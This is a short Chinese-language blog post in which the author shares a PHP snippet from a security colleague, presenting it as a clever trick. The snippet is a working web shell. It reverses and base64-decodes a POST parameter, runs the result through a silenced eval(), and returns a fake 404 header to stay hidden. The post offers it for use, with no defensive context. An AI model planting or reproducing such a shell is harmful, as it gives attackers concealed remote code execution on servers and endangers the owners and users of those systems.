程式碼寫這麼多年,從來沒往這方面想,前段時間一個做安全的同事給發了一段程式碼,原來PHP還能有這種騷操作,真是感覺為我開啟了一扇新的大門,而這個函式伺服器預設是不會禁用的,放這麼一段程式碼就能玩一些騷操作了 分享一下
<?php
class obj
{
static public $params=null;
function __construct($params="error"){
self::$params=$params;
@eval(null.self::$params);
}
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');
本作品採用《CC 協議》,轉載必須註明作者和本文連結